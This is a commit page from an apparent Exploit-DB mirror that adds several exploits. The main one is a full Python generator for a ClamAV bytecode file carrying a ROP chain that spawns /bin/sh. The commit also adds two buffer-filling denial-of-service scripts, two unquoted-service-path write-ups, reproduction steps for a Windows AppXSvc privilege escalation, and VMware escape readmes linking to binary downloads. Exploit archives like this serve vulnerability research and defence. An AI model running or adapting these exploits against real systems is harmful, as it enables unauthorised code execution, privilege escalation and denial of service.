bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-11-26

Browse source 
9 changes to exploits/shellcodes

SMPlayer 19.5.0 - Denial of Service (PoC)
InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)

ClamAV < 0.102.0 - 'bytecode_vm' Code Execution
Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path
Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
VMware WorkStation 12.5.5 - Virtual Machine Escape
VMware WorkStation 12.5.3 - Virtual Machine Escape
This commit is contained in:
Offensive Security 2019-11-26 05:01:44 +00:00
parent f1354b784a
commit 8162754975
10 changed files with 895 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
exploits/hardware/webapps/47663.txt
View file

@ -6,7 +6,7 @@
# Software Link: https://www.lexmark.com/en_us.html
# Version: 2.27.4.0.39 (Latest Version)
# Tested on: Windows Server 2012
# CVE : N/A
# CVE : CVE-2019-16758
Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability.

657
exploits/linux/local/47687.py Executable file
View file

@ -0,0 +1,657 @@
#!/usr/bin/python
'''
Finished : 22/07/2019
Pu8lished : 31/10/2019
Versi0n : Current (<= 0.102.0)
Result : Just for fun.
"Because of my inability to change the world."
In 2002, ClamAV got introducted as a solution for malwares on UNIX-based systems, built on
a signature-based detection approach, and still undergoes active-development. by that time,
LibClamAV only held 2 binaries, and expanded to 5 at present.
ClamBC were exceptionally more complex and served as a testing tool for bytecodes, majorly
validating and interpreting the code therein, and the information provided didn't indicate
nor explain the presence of its internal mechanisms.
The availability of the source-code and the lack of documentation led to the establishment
of this paper, it was certainly not an attempt to escalate privileges, but rather a sought
-after experience, and source of entertainment that grants the thrill of a challenge.
Due to the considerable amount of time spent in the analysis, the dissection of the engine
was imminent, whilst significantly broadening our perception on its internal structures.
The trial and error process produced valuable information, crashes illuminated latent bugs,
effectively increasing the attack surface, and magnifying the possibility for exploitation.
> ./exploit.py
> clambc --debug exploit
[SNIP]
$
'''
names = ['test1',
'read',
'write',
'seek',
'setvirusname',
'debug_print_str',
'debug_print_uint',
'disasm_x86',
'trace_directory',
'trace_scope',
'trace_source',
'trace_op',
'trace_value',
'trace_ptr',
'pe_rawaddr',
'file_find',
'file_byteat',
'malloc',
'test2',
'get_pe_section',
'fill_buffer',
'extract_new',
'read_number',
'hashset_new',
'hashset_add',
'hashset_remove',
'hashset_contains',
'hashset_done',
'hashset_empty',
'buffer_pipe_new',
'buffer_pipe_new_fromfile',
'buffer_pipe_read_avail',
'buffer_pipe_read_get',
'buffer_pipe_read_stopped',
'buffer_pipe_write_avail',
'buffer_pipe_write_get',
'buffer_pipe_write_stopped',
'buffer_pipe_done',
'inflate_init',
'inflate_process',
'inflate_done',
'bytecode_rt_error',
'jsnorm_init',
'jsnorm_process',
'jsnorm_done',
'ilog2',
'ipow',
'iexp',
'isin',
'icos',
'memstr',
'hex2ui',
'atoi',
'debug_print_str_start',
'debug_print_str_nonl',
'entropy_buffer',
'map_new',
'map_addkey',
'map_setvalue',
'map_remove',
'map_find',
'map_getvaluesize',
'map_getvalue',
'map_done',
'file_find_limit',
'engine_functionality_level',
'engine_dconf_level',
'engine_scan_options',
'engine_db_options',
'extract_set_container',
'input_switch',
'get_environment',
'disable_bytecode_if',
'disable_jit_if',
'version_compare',
'check_platform',
'pdf_get_obj_num',
'pdf_get_flags',
'pdf_set_flags',
'pdf_lookupobj',
'pdf_getobjsize',
'pdf_getobj',
'pdf_getobjid',
'pdf_getobjflags',
'pdf_setobjflags',
'pdf_get_offset',
'pdf_get_phase',
'pdf_get_dumpedobjid',
'matchicon',
'running_on_jit',
'get_file_reliability',
'json_is_active',
'json_get_object',
'json_get_type',
'json_get_array_length',
'json_get_array_idx',
'json_get_string_length',
'json_get_string',
'json_get_boolean',
'json_get_int']
o = names.index('buffer_pipe_new') + 1
k = names.index('buffer_pipe_write_get') + 1
l = names.index('debug_print_str') + 1
m = names.index('malloc') + 1
c = 0
for name in names:
names[c] = name.encode('hex')
c += 1
def cc(n):
v = chr(n + 0x60)
return v
def cs(s):
t = ''
for i in xrange(0, len(s), 2):
u = int(s[i], 16)
l = int(s[i + 1], 16)
for i in [u, l]:
if((i >= 0 and i <= 0xf)):
continue
print 'Invalid string.'
exit(0)
t += cc(l) + cc(u)
return t
def wn(n, fixed=0, size=0):
if n is 0:
return cc(0)
t = ''
c = hex(n)[2:]
l = len(c)
if (l % 2) is 1:
c = "0" + c
r = c[::-1]
if(l <= 0x10):
if not fixed:
t = cc(l)
i = 0
while i < l:
t += cc(int(r[i], 16))
i += 1
else:
print 'Invalid number.'
exit(0)
if size != 0:
t = t.ljust(size, '`')
return t
def ws(s):
t = '|'
e = s[-2:]
if(e != '00'):
print '[+] Adding null-byte at the end of the string..'
s += '00'
l = (len(s) / 2)
if (len(s) % 2) is 1:
print 'Invalid string length.'
exit(0)
t += wn(l)
t += cs(s)
return t
def wt(t):
if t < (num_types + 0x45):
v = wn(t)
return v
else:
print 'Invalid type.'
exit(0)
def initialize_header(minfunc=0, maxfunc=0, num_func=0, linelength=4096):
global flimit, num_types
if maxfunc is 0:
maxfunc = flimit
if(minfunc > flimit or maxfunc < flimit):
print 'Invalid minfunc and/or maxfunc.'
exit(0)
header = "ClamBC"
header += wn(0x07) # formatlevel(6, 7)
header += wn(0x88888888) # timestamp
header += ws("416c69656e") # sigmaker
header += wn(0x00) # targetExclude
header += wn(0x00) # kind
header += wn(minfunc) # minfunc
header += wn(maxfunc) # maxfunc
header += wn(0x00) # maxresource
header += ws("00") # compiler
header += wn(num_types + 5) # num_types
header += wn(num_func) # num_func
header += wn(0x53e5493e9f3d1c30) # magic1
header += wn(0x2a, 1) # magic2
header += ':'
header += str(linelength)
header += chr(0x0a)*2
return header
def prepare_types(contained, type=1, nume=1):
global num_types
types = "T"
types += wn(0x45, 1) # start_tid(69)
for i in range(0, num_types):
types += wn(type[i], 1) # kind
if type[i] in [1, 2, 3]:
# Function, PackedStruct, Struct
types += wn(nume[i]) # numElements
for j in range(0, nume[i]):
types += wt(contained[i][j]) # containedTypes[j]
else:
# Array, Pointer
if type[i] != 5:
types += wn(nume[i]) # numElements
types += wt(contained[i][0]) # containedTypes[0]
types += chr(0x0a)
return types
def prepare_apis(calls=1):
global maxapi, names, ids, tids
if(calls > max_api):
print 'Invalid number of calls.'
exit(0)
apis = 'E'
apis += wn(max_api) # maxapi
apis += wn(calls) # calls(<= maxapi)
for i in range(0, calls):
apis += wn(ids[i]) # id
apis += wn(tids[i]) # tid
apis += ws(names[ids[i] - 1]) # name
apis += chr(0x0a)
return apis
def prepare_globals(numglobals=1):
global max_globals, type, gval
globals = 'G'
globals += wn(max_globals) # maxglobals
globals += wn(numglobals) # numglobals
for i in range(0, numglobals):
globals += wt(type[i]) # type
for j in gval[i]: # subcomponents
n = wn(j)
globals += chr(ord(n[0]) - 0x20)
globals += n[1:]
globals += cc(0)
globals += chr(0x0a)
return globals
def prepare_function_header(numi, numbb, numa=1, numl=0):
global allo
if numa > 0xf:
print 'Invalid number of arguments.'
exit(0)
fheader = 'A'
fheader += wn(numa, 1) # numArgs
fheader += wt(0x20) # returnType
fheader += 'L'
fheader += wn(numl) # numLocals
for i in range(0, numa + numl):
fheader += wn(type[i]) # types
fheader += wn(allo[i], 1) # | 0x8000
fheader += 'F'
fheader += wn(numi) # numInsts
fheader += wn(numbb) # numBB
fheader += chr(0x0a)
return fheader
flimit = 93
max_api = 100
max_globals = 32773
num_types = 6
# Header parsing
w = initialize_header(num_func=0x1)
# Types parsing
cont = [[0x8], [0x45], [0x20, 0x20], [0x41, 0x20, 0x20], [0x20, 0x41, 0x20], [0x41, 0x20]]
type = [0x4, 0x5, 0x1, 0x1, 0x1, 0x1]
num = [0x8, 0x1, 0x2, 0x3, 0x3, 0x2]
w += prepare_types(cont, type, num)
# API parsing
ids = [o, k, l, m]
tids = [71, 72, 73, 74]
w += prepare_apis(0x4)
'''
# crash @ id=0
'''
# Globals parsing
type = [0x45]
gval = [[0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41]]
w += prepare_globals(0x1)
# Function header parsing
type = [0x45, 0x41, 0x40, 0x40, 0x40, 0x40, 0x20]
allo = [ 1, 0, 0, 0, 0, 0, 0]
w += prepare_function_header(35, 0x1, 0x0, 0x7)
# BB parsing
p = 'B'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x0)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += '@d'
# STORE (0x0068732f6e69622f(L=8) -> ([Var #1]))
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Nobbfifnfobcghfh'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x360)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'C`fcd'
# LOAD Var #2 = ([Var #1])
p += wn(0x40)
p += wn(0x2)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #2 -= 0xd260
p += wn(0x40)
p += wn(0x2)
p += wn(0x2, 1, 2)
p += wn(0x2)
p += 'D`fbmd'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# LOAD Var #3 = ([Var #1])
p += wn(0x40)
p += wn(0x3)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #3 -= 0x10
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'B`ad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# LOAD Var #4 = ([Var #1])
p += wn(0x40)
p += wn(0x4)
p += wn(0x27, 1)
p += wn(0x1)
# SUB Var #4 -= 0x190
p += wn(0x40)
p += wn(0x4)
p += wn(0x2, 1, 2)
p += wn(0x4)
p += 'C`iad'
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x38)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhcd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x48)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhdd'
# ADD Var #3 += 0x3
p += wn(0x40)
p += wn(0x3)
p += wn(0x2, 1, 2)
p += wn(0x3)
p += 'Acd'
# STORE (Var #3 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x3)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x28)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhbd'
# ADD Var #5 += Var #2 + 0xcbda
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Djmkld'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x20)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`bd'
# STORE (Var #4 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x4)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x18)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Bhad'
# ADD Var #5 += Var #2 + 0x99dc
p += wn(0x40)
p += wn(0x5)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dlmiid'
# STORE (Var #5 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x5)
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x10)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`ad'
# STORE (0x3b -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += 'Bkcd'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x30)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`cd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x40)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'B`dd'
# STORE (0x0 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += '@d'
p += wn(0x1)
# GEPZ Var #1 = ((Var #0(Stack) Pointer) + 0x8)
p += wn(0x0)
p += wn(0x1)
p += wn(0x24, 1)
p += wn(0x46)
p += wn(0x0)
p += 'Ahd'
# ADD Var #2 += 0x6d68
p += wn(0x40)
p += wn(0x2)
p += wn(0x1, 1, 2)
p += wn(0x2)
p += 'Dhfmfd'
# STORE (Var #2 -> Var #1)
p += wn(0x40)
p += wn(0x0)
p += wn(0x26, 1)
p += wn(0x2)
p += wn(0x1)
'''
0x99dc : pop rdi ; ret
0xcbda : pop rsi ; ret
0x6d68 : pop rax ; ret
Var #2 = text_base
Var #3 = syscall (+3: pop rdx; ret)
Var #4 = "/bin/sh\x00"
pop rax; ret; o 0x8
59 o 0x10
pop rdi; ret; o 0x18
sh; address o 0x20
pop rsi; ret; o 0x28
0x0 o 0x30
pop rdx; ret; o 0x38
0x0 o 0x40
syscall o 0x48
'''
# COPY Var #6 = (0x5a90050f(o`e``ije))
p += wn(0x20)
p += wn(0x0)
p += wn(0x22, 1)
p += 'Ho`e``ijeh'
p += wn(0x6)
p += 'T'
p += wn(0x13, 1)
p += wn(0x20)
p += wn(0x6)
p += 'E'
w += p
f = open("exploit", "w")
f.write(w)
f.close()
print '[+] Generated payload'
'''
Mortals represent immorality, clueless, they crush each other in an everlasting
pursuit to climb the ladder of social-status, greed is engraved in their nature,
they're materialistic, and the essence of their lives is money and wealth.
However, such definition is inaccurate as it doesn't apply to the minority.
I have discovered a truly marvelous proof of their existence, which this margin
is too narrow to contain.
- Alien599, not Fermat.
Greetings to Alien133, Alien610, Alien6068, Alien814, Alien641.
X
'''

23
exploits/windows/dos/47709.py Executable file
View file

@ -0,0 +1,23 @@
# Title : SMPlayer 19.5.0 - Denial of Service (PoC)
# Tested on : Windows 7 (64 bit)
# Vulnerable Software: SMPlayer v 19.5.0
# Exploit Author: Malav Vyas
# Vendor Homepage: https://smplayer.info
# Version : 19.5.0
# Software Link : https://smplayer.info/en/downloads
# POC
# run this python file, which will generate attack.m3u file
# .m3u file is used as a playlist
# this python file will generate a .m3u file with 25000 "A" characters.
# Open this file in SMPlayer two times.
# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.
# For more details, please refer to video
f="attack.m3u"
bof = "A"*25000
writeFile = open(f, "w")
writeFile.write(bof)
writeFile.close()

24
exploits/windows/dos/47711.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 12019-11-16
# Vendor Homepage: https://on.wonderware.com/
# Software Link : https://on.wonderware.com/intouch-machine-edition
# Tested Version: 8.1 SP1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# InTouch Machine Edition 8.1 SP1.py
# Steps to Produce the Local Buffer Overflow (SEH Unicode):
# 1.- Run python code: InTouch_Machine_Edition_8.1.py
# 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
# 3.- Open ITME v8.1 InTouch Machine Edition
# 4.- On Graficos slect Atributos
# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar"
#!/usr/bin/env python
buffer = "\x41" * 1026
f = open ("InTouch_Machine_Edition_8.1.txt", "w")
f.write(buffer)
f.close()

34
exploits/windows/local/47710.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path
# Discovery by: Luis Martinez
# Discovery Date: 2019-11-24
# Vendor Homepage: https://www.dell.com/
# Software Link : https://www.dell.com/support/home/mx/es/mxbsdt1/drivers/driversdetails?driverid=vwpkk
# Tested Version: 1.1.6.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Audio" | findstr /i /v """
Waves Audio Services WavesSysSvc C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe Auto
# Service info:
C:\>sc qc WavesSysSvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WavesSysSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Waves Audio Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

36
exploits/windows/local/47712.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path
# Date: 2019-11-22
# Exploit Author: Rene Cortes S
# Vendor Homepage: https://easy-hide-ip.com
# Software Link: https://easy-hide-ip.com
# Version: 5.0.0.3
# Tested on: Windows 7 Professional Service Pack 1
##########################################################################################################################
Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
EasyRedirect EasyRedirect C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe Auto
##############################################################################################################################################
Service info:
C:\Users\user>sc qc EasyRedirect
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: EasyRedirect
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Easy-Hide-IP\rdr\EasyRedirect.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : EasyRedirect
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#########################################################################################################################

59
exploits/windows/local/47713.txt Normal file
View file

@ -0,0 +1,59 @@
# Exploit Title: Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation
# Date: 2019-11-22
# Exploit Author: Abdelhamid Naceri
# Vendor Homepage: www.microsoft.com
# Tested on: Windows 10 1903
# CVE : CVE-2019-1385
Windows: "AppX Deployment Service" (AppXSVC) elevation of privilege vulnerability
Class: Local Elevation of Privileges
Description:
This Poc is exploiting a vulnerability in (AppXSvc) , abusing this vulnerability
could allow an attacker to overwrite\create file as SYSTEM which can result in EOP .
The're is 2 way to abuse the issue .
Step To Reproduce :
[1] For An Arbitrary File Creation
1-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a Junction To
your target directory example "c:\"
2-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
3-Check the directory the file should be created now
4-Enjoy:)
[2] To Overwrite File
1-Create a temp dir in %temp%\
2-Create a hardlink to your target file in the temp created dir
3-Turn %userprofile%\AppData\Local\Microsoft\WindowsApps\Backup Into a junction to
your temp created dir
4-Open Powershell and execute the command Add-AppxPackage -RegisterByFamilyName -ForceApplicationShutdown -MainPackage Microsoft.MicrosoftEdge_8wekyb3d8bbwe
5-Check the file again
Limitation :
when 'MicrosoftEdge.exe' is created it would inherit the directory permission which
mean the file wouldnt be writtable in majority of cases but a simple example of
abusement in the directory "c:\" <- the default acl is preventing Athenticated Users
from creating file but not modifying them so if we abused the vulnerability in "c:\"
we will have an arbitrary file created and also writeable from a normal user .
also you cant overwrite file that are not writable by SYSTEM , i didnt make a check
in the poc because in if the file is non readable by the current user the check will
return false even if the file is writtable by SYSTEM . NOTE : you can also overwrite
file which you cant even read them .
In the file creation make sure the path is writtable by SYSTEM otherwise the poc will
fail . I think 99% of folders are writtable by SYSTEM
Platform:
This has been tested on a fully patched system (latest patch -> November 2019) :
OS Edition: Microsoft Windows 10 Home
Os Version: 1903
OS Version Info: 18362.418
Additional Info
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuldLabEx = 18362.1.amd64fre.19h1_release.190318-1202
Expected result:
The Deployment Process should fail with "ERROR_ACCESS_IS_DENIED"
Observed result :
The Deployment Process is overwritting or creating an arbitrary file as
"LOCAL SYSTEM"
NOTE : It was patched on 7/11/19

25
exploits/windows/local/47714.md Normal file
View file

@ -0,0 +1,25 @@
# VMware Escape Exploit
VMware Escape Exploit before VMware WorkStation 12.5.5
Host Target: Win10 x64
Compiler: VS2013
Test on VMware 12.5.2 build-4638234
# Known issues
* Failing to heap manipulation causes host process crash.
* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH.
# FAQ
* Q: Error in reboot vmware after crashing process.
* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.
![](https://github.com/unamer/vmware_escape/raw/master/cve-2017-4901/exp.gif)
EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47714.zip

28
exploits/windows/local/47715.md Normal file
View file

@ -0,0 +1,28 @@
# VMware Escape Exploit
VMware Escape Exploit before VMware WorkStation 12.5.3
Host Target: Win10 x64
Compiler: VS2013
Test on VMware 12.5.2 build-4638234
# Known issues
* Failing to heap manipulation causes host process crash. (About 50% successful rate )
* Not quite elaborate because I'm not good at doing heap "fengshui" on winows LFH.
# FAQ
* Q: Error in reboot vmware after crashing process.
* A: Just remove ***.lck** folder in your vm directory or wait a while and have a coffee :).Here is a simple [script](https://raw.githubusercontent.com/unamer/vmware_escape/master/cve-2017-4901/cleanvm.bat) I used to clean up.
![](https://github.com/unamer/vmware_escape/raw/master/CVE-2017-4905_and_uaf/exploit.gif)
# Reference
* https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47715.zip

8
files_exploits.csv
View file

@ -6605,6 +6605,8 @@ id,file,description,date,author,type,platform,port
47693,exploits/linux/dos/47693.txt,"Ubuntu 19.10 - Refcount Underflow and Type Confusion in shiftfs",2019-11-20,"Google Security Research",dos,linux,
47694,exploits/ios/dos/47694.txt,"iOS 12.4 - Sandbox Escape due to Integer Overflow in mediaserverd",2019-11-20,"Google Security Research",dos,ios,
47707,exploits/windows/dos/47707.txt,"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback",2019-11-22,"Google Security Research",dos,windows,
47709,exploits/windows/dos/47709.py,"SMPlayer 19.5.0 - Denial of Service (PoC)",2019-11-25,"Malav Vyas",dos,windows,
47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10793,6 +10795,7 @@ id,file,description,date,author,type,platform,port
47676,exploits/windows/local/47676.txt,"Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path",2019-11-19,"Luis Martínez",local,windows,
47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,
47685,exploits/windows_x86-64/local/47685.txt,"DOUBLEPULSAR (x64) - Hooking 'srv!SrvTransactionNotImplemented' in 'srv!SrvTransaction2DispatchTable'",2019-11-03,Mumbai,local,windows_x86-64,
47687,exploits/linux/local/47687.py,"ClamAV < 0.102.0 - 'bytecode_vm' Code Execution",2019-11-02,anonymous,local,linux,
47695,exploits/windows/local/47695.rb,"Windows - Escalate UAC Protection Bypass (Via dot net profiler) (Metasploit)",2019-11-20,Metasploit,local,windows,
47696,exploits/windows/local/47696.rb,"Windows - Escalate UAC Protection Bypass (Via Shell Open Registry Key) (Metasploit)",2019-11-20,Metasploit,local,windows,
47701,exploits/unix/local/47701.rb,"Xorg X11 Server - Local Privilege Escalation (Metasploit)",2019-11-20,Metasploit,local,unix,
@ -10800,6 +10803,11 @@ id,file,description,date,author,type,platform,port
47705,exploits/windows/local/47705.txt,"ProShow Producer 9.0.3797 - ('ScsiAccess') Unquoted Service Path",2019-11-22,ZwX,local,windows,
47706,exploits/windows/local/47706.txt,"LiteManager 4.5.0 - Insecure File Permissions",2019-11-22,ZwX,local,windows,
47708,exploits/macos/local/47708.txt,"macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache",2019-11-22,"Google Security Research",local,macos,
47710,exploits/windows/local/47710.txt,"Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path",2019-11-25,"Luis Martínez",local,windows,
47712,exploits/windows/local/47712.txt,"Easy-Hide-IP 5.0.0.3 - 'EasyRedirect' Unquoted Service Path",2019-11-25,"Rene Cortes S",local,windows,
47713,exploits/windows/local/47713.txt,"Microsoft Windows AppXsvc Deployment Extension - Privilege Escalation",2019-11-25,"Abdelhamid Naceri",local,windows,
47714,exploits/windows/local/47714.md,"VMware WorkStation 12.5.5 - Virtual Machine Escape",2017-08-08,unamer,local,windows,
47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

Can't render this file because it is too large.